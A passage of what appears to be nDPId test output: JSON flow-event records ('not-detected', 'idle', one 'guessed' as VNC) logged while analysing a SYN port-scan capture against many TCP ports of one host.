{"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5800,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":995,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5802,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":995,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5802,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9898,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1052,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5802,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1052,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5802,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9898,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5810,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5810,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5810,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5810,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5811,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5811,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1717,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1002,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1002,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1717,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3766,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5815,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5815,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3766,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
